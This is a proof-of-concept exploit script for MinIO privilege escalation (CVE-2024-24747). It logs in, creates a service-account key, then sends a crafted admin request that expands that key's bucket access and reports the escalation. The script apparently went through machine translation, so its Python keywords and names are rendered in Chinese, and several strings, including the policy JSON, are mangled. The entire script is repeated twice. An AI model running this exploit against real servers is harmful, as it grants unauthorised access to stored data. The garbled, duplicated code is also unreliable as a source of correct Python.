#利用标题: Minio 2024-01-31T20-20-20-33Z-特权升级
#日期: 2024-04-11
#利用作者: Jenson Zhao
#供应商HomePage: https://min.io/
#软件link: https://github.com/minio/minio/
#版本:到(不包括)版本。2024-01-31T20-20-20-33Z
#测试在: Windows 10
#CVE : CVE-2024-24747
#在执行之前要求: PIP安装Minio,请求
导入argparse
导入日期
导入追踪
导入Urllib
来自xml.dom.minidom导入parsestring
导入请求
进口JSON
导入基础64
从minio.credentials导入凭据
来自minio.signer导入sign_v4_s3
CVE_2024_24747:类
new_buckets=[]
old_buckets=[]
def __init __(self,host,port,console_port,accesskey,secretkey,verify=false):
self.bucket_names=['pocpublic','pocprivate']
self.new_accesskey='miniocvepoc'
self.new_secretkey='miniocvepoc'
self.headers={
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)
'content-type':'应用程序/json',
'Accept':'/'
}
self.accesskey=accessKey
self.secretkey=SecretKey
self.verify=验证
如果验证:
self.url='https://' +主机+':' +端口
self.console_url='https://' +主机+':' + console_port
其他:
self.url='http://' +主机+':' +端口
self.console_url='http://' +主机+':' + console_port
self.credits=凭据(
access_key=self.new_accesskey,
secret_key=self.new_secretkey
)
self.login()
TRY:
self.create_buckets()
self.create_accesskey()
self.old_buckets=self.console_ls()
self.console_exp()
self.new_buckets=self.console_ls()
Except:
trackback.print_stack()
最后:
self.delete_accesskey()
self.delete_buckets()
如果len(self.new_buckets)len(self.old_buckets):
打印(“ CVE-2024-24747有Minio的问题!')
print('漏洞之前,存储桶为:' + str(self.old_buckets))
打印('漏洞后,水桶为:' + str(self.new_buckets))
其他:
打印('Minio没有CVE-2024-24747问题!')
def登录(自我):
url=self.url +'/api/v1/login'
有效载荷=json.dumps({
'AccessKey': self.Accesskey,
'SecretKey': self.secretkey
}))
self.session=requests.session()
如果self.verify:
self.session.verify=false
status_code=self.session.request('post',url,headers=self.headers,data=有效载荷).status_code
#print(status_code)
如果status_code==204:
status_code=0
其他:
打印(“登录失败!请检查输入AccessKey和SecretKey是否正确!”)
出口(1)
def create_buckets(self):
url=self.url +'/api/v1/buckets'
为self.bucket_names:中的名称
有效载荷=json.dumps({
'name':名称,
'versioning': false,
'locking': false
}))
status_code=self.session.request('post',url,headers=self.headers,data=有效载荷).status_code
#print(status_code)
如果status_code==200:
status_code=0
其他:
打印('new(new)'+名称+'桶失败(失败)!')
Def Delete_buckets(self):
为self.bucket_names:中的名称
url=self.url +'/api/v1/buckets/' +名称
status_code=self.session.request('delete',url,headers=self.headers).status_code
#print(status_code)
如果status_code==204:
status_code=0
其他:
print('delete(delete)'+名称+'桶失败(失败)!')
def create_accesskey(self):
url=self.url +'/api/v1/service-account-credentials'
有效载荷=json.dumps({
'polity':'{\ n \'版本\': \'2012-10-17 \',\ n \'语句\': [\ n {\ n {\ n \'feastr \': \': \ ],\ n \'resource \': [\ n \'arn:AWS:S33333333333333333333333333
ocpublic \',\ n \ n \'arn33:AW } \ n] \ n}',
'accessKey': self.new_accesskey,
'SecretKey': self.new_secretkey
}))
status_code=self.session.request('post',url,headers=self.headers,data=有效载荷).status_code
#print(status_code)
如果status_code==201:
#print('new(new)' + self.new_accesskey +'AccessKey Success(Success)!')
#print(self.new_secretkey)
status_code=0
其他:
print('new(new)' + self.new_accesskey +'accessKey失败(失败)!')
DEF DELETE_ACCESSKEY(self):
url=self.url +'/api/v1/service-accounts/' + base64.b64encode(self.new_accesskey.encode('utf-8''))。解码('utf-8')
status_code=self.session.request('delete',url,headers=self.headers).status_code
#print(status_code)
如果status_code==204:
#print('delete' + self.new_accesskey +'AccessKey成功!')
status_code=0
其他:
print('delete(delete)' + self.new_accesskey +'accessKey失败(失败)!')
def headers_gen(self,url,sha256,方法):
dateTimes=dateTime.dateTime.utcnow()
datetime_str=datetimes.strftime('%y%m%dt%h%m%sz')
urls=urllib.parse.urlparse(url)
标题={
'X-AMZ-CONTENT-SHA256': SHA256,
'x-amz-date': datetime_str,
'host': urls.netloc,
}
标题=sign_v4_s3(
方法=方法,
url=url,
区域='us-east-1',
标题=标题,
凭据=self.credits,
content_sha256=sha256,
date=datetimes,
)
返回标题
def console_ls(self):
url=self.console_url +'/'
SHA256='E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855'
headers=self.headers_gen(url,sha256,'get')
如果self.verify:
响应=requests.get(url,headers=标题,验证=false)
其他:
响应=requests.get(url,标头=标题)
domtree=parsestring(wendesp.text)
集合=Domtree.DocumentElement
buckets=collection.getElementsbytagname('bucket')
bucket_names=[]
对于桶中的桶:
bucket_names.append(bucket.getElementsbytagname('name')[0] .childnodes [0] .data)
#print('当前可见的存储桶有: \ n' + str(bucket_names))
返回bucket_names
def console_exp(self):
url=self.console_url +'/minio/admin/v3/update-service-account?accessKey=' + self.new_accesskey
SHA256='0F87FD59DFF29507F82E189D4F493206EA7F370D0CE97B9CC8C1B1B7A4E609EC95'
标题=self.headers_gen(url,sha256,'post')
hex_string='e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336'
content=bytes.fromhex(hex_string)
如果self.verify:
响应=requests.post(url,headers=标题,data=content,verify=false)
其他:
响应=requests.post(url,headers=标题,data=content)
status_code=reverse.status_code
如果status_code==204:
#print('高架' + self.new_accesskey +'许可成功!')
status_code=0
其他:
print('propart)' + self.new_accesskey +'权限失败!')
如果name=='__ -Main __':
徽标='''
__ __ _ _____ _ _____ _ ______ _ ______
_ __ __ | _ \/_ \ | _ \ | || | _ \ | || | __ || | _ || || | _ |
/__ | \ \ \//_ \ ______ )|| | | | | | )|| || | _ ___)|| || || | _//| || | _///
| (__ \ V/| /|_____|//| |_| |//|_ ||____ |//| |//|_ _|//
\ _ | \ /\ _ | | ______ | \ /| _ | | _____ | | _____ | | _ |//| _ | //
'''
打印(徽标)
Parser=argparse.argumentparser()
parser.add_argument(' - h',' - horst',必需=true,help='target的主机。示例: 127.0.0.0.1')
parser.add_argument(' - a',' - accesskey',必需=true,help='目标的minio AccessKey。示例: miniioadmin')
parser.add_argument(' - s',' - secretkey',必需=true,help='目标的minio secretkey。示例: miniioadmin')
parser.add_argument(' - c',' - console_port',必需=true,help='目标的minio控制台端口。示例: 9000')
parser.add_argument(' - p',' - port',必需=true,help='目标的minio端口。示例: 9090')
parser.add_argument(' - https',action='store_true',help='是通过https访问的。')
args=parser.parse_args()
CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)
#日期: 2024-04-11
#利用作者: Jenson Zhao
#供应商HomePage: https://min.io/
#软件link: https://github.com/minio/minio/
#版本:到(不包括)版本。2024-01-31T20-20-20-33Z
#测试在: Windows 10
#CVE : CVE-2024-24747
#在执行之前要求: PIP安装Minio,请求
导入argparse
导入日期
导入追踪
导入Urllib
来自xml.dom.minidom导入parsestring
导入请求
进口JSON
导入基础64
从minio.credentials导入凭据
来自minio.signer导入sign_v4_s3
CVE_2024_24747:类
new_buckets=[]
old_buckets=[]
def __init __(self,host,port,console_port,accesskey,secretkey,verify=false):
self.bucket_names=['pocpublic','pocprivate']
self.new_accesskey='miniocvepoc'
self.new_secretkey='miniocvepoc'
self.headers={
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)
'content-type':'应用程序/json',
'Accept':'/'
}
self.accesskey=accessKey
self.secretkey=SecretKey
self.verify=验证
如果验证:
self.url='https://' +主机+':' +端口
self.console_url='https://' +主机+':' + console_port
其他:
self.url='http://' +主机+':' +端口
self.console_url='http://' +主机+':' + console_port
self.credits=凭据(
access_key=self.new_accesskey,
secret_key=self.new_secretkey
)
self.login()
TRY:
self.create_buckets()
self.create_accesskey()
self.old_buckets=self.console_ls()
self.console_exp()
self.new_buckets=self.console_ls()
Except:
trackback.print_stack()
最后:
self.delete_accesskey()
self.delete_buckets()
如果len(self.new_buckets)len(self.old_buckets):
打印(“ CVE-2024-24747有Minio的问题!')
print('漏洞之前,存储桶为:' + str(self.old_buckets))
打印('漏洞后,水桶为:' + str(self.new_buckets))
其他:
打印('Minio没有CVE-2024-24747问题!')
def登录(自我):
url=self.url +'/api/v1/login'
有效载荷=json.dumps({
'AccessKey': self.Accesskey,
'SecretKey': self.secretkey
}))
self.session=requests.session()
如果self.verify:
self.session.verify=false
status_code=self.session.request('post',url,headers=self.headers,data=有效载荷).status_code
#print(status_code)
如果status_code==204:
status_code=0
其他:
打印(“登录失败!请检查输入AccessKey和SecretKey是否正确!”)
出口(1)
def create_buckets(self):
url=self.url +'/api/v1/buckets'
为self.bucket_names:中的名称
有效载荷=json.dumps({
'name':名称,
'versioning': false,
'locking': false
}))
status_code=self.session.request('post',url,headers=self.headers,data=有效载荷).status_code
#print(status_code)
如果status_code==200:
status_code=0
其他:
打印('new(new)'+名称+'桶失败(失败)!')
Def Delete_buckets(self):
为self.bucket_names:中的名称
url=self.url +'/api/v1/buckets/' +名称
status_code=self.session.request('delete',url,headers=self.headers).status_code
#print(status_code)
如果status_code==204:
status_code=0
其他:
print('delete(delete)'+名称+'桶失败(失败)!')
def create_accesskey(self):
url=self.url +'/api/v1/service-account-credentials'
有效载荷=json.dumps({
'polity':'{\ n \'版本\': \'2012-10-17 \',\ n \'语句\': [\ n {\ n {\ n \'feastr \': \': \ ],\ n \'resource \': [\ n \'arn:AWS:S33333333333333333333333333
ocpublic \',\ n \ n \'arn33:AW } \ n] \ n}','accessKey': self.new_accesskey,
'SecretKey': self.new_secretkey
}))
status_code=self.session.request('post',url,headers=self.headers,data=有效载荷).status_code
#print(status_code)
如果status_code==201:
#print('new(new)' + self.new_accesskey +'AccessKey Success(Success)!')
#print(self.new_secretkey)
status_code=0
其他:
print('new(new)' + self.new_accesskey +'accessKey失败(失败)!')
DEF DELETE_ACCESSKEY(self):
url=self.url +'/api/v1/service-accounts/' + base64.b64encode(self.new_accesskey.encode('utf-8''))。解码('utf-8')
status_code=self.session.request('delete',url,headers=self.headers).status_code
#print(status_code)
如果status_code==204:
#print('delete' + self.new_accesskey +'AccessKey成功!')
status_code=0
其他:
print('delete(delete)' + self.new_accesskey +'accessKey失败(失败)!')
def headers_gen(self,url,sha256,方法):
dateTimes=dateTime.dateTime.utcnow()
datetime_str=datetimes.strftime('%y%m%dt%h%m%sz')
urls=urllib.parse.urlparse(url)
标题={
'X-AMZ-CONTENT-SHA256': SHA256,
'x-amz-date': datetime_str,
'host': urls.netloc,
}
标题=sign_v4_s3(
方法=方法,
url=url,
区域='us-east-1',
标题=标题,
凭据=self.credits,
content_sha256=sha256,
date=datetimes,
)
返回标题
def console_ls(self):
url=self.console_url +'/'
SHA256='E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855'
headers=self.headers_gen(url,sha256,'get')
如果self.verify:
响应=requests.get(url,headers=标题,验证=false)
其他:
响应=requests.get(url,标头=标题)
domtree=parsestring(wendesp.text)
集合=Domtree.DocumentElement
buckets=collection.getElementsbytagname('bucket')
bucket_names=[]
对于桶中的桶:
bucket_names.append(bucket.getElementsbytagname('name')[0] .childnodes [0] .data)
#print('当前可见的存储桶有: \ n' + str(bucket_names))
返回bucket_names
def console_exp(self):
url=self.console_url +'/minio/admin/v3/update-service-account?accessKey=' + self.new_accesskey
SHA256='0F87FD59DFF29507F82E189D4F493206EA7F370D0CE97B9CC8C1B1B7A4E609EC95'
标题=self.headers_gen(url,sha256,'post')
hex_string='e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336'
content=bytes.fromhex(hex_string)
如果self.verify:
响应=requests.post(url,headers=标题,data=content,verify=false)
其他:
响应=requests.post(url,headers=标题,data=content)
status_code=reverse.status_code
如果status_code==204:
#print('高架' + self.new_accesskey +'许可成功!')
status_code=0
其他:
print('propart)' + self.new_accesskey +'权限失败!')
如果name=='__ -Main __':
徽标='''
__ __ _ _____ _ _____ _ ______ _ ______
_ __ __ | _ \/_ \ | _ \ | || | _ \ | || | __ || | _ || || | _ |
/__ | \ \ \//_ \ ______ )|| | | | | | )|| || | _ ___)|| || || | _//| || | _///
| (__ \ V/| /|_____|//| |_| |//|_ ||____ |//| |//|_ _|//
\ _ | \ /\ _ | | ______ | \ /| _ | | _____ | | _____ | | _ |//| _ | //
'''
打印(徽标)
Parser=argparse.argumentparser()
parser.add_argument(' - h',' - horst',必需=true,help='target的主机。示例: 127.0.0.0.1')
parser.add_argument(' - a',' - accesskey',必需=true,help='目标的minio AccessKey。示例: miniioadmin')
parser.add_argument(' - s',' - secretkey',必需=true,help='目标的minio secretkey。示例: miniioadmin')
parser.add_argument(' - c',' - console_port',必需=true,help='目标的minio控制台端口。示例: 9000')
parser.add_argument(' - p',' - port',必需=true,help='目标的minio端口。示例: 9090')
parser.add_argument(' - https',action='store_true',help='是通过https访问的。')
args=parser.parse_args()
CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)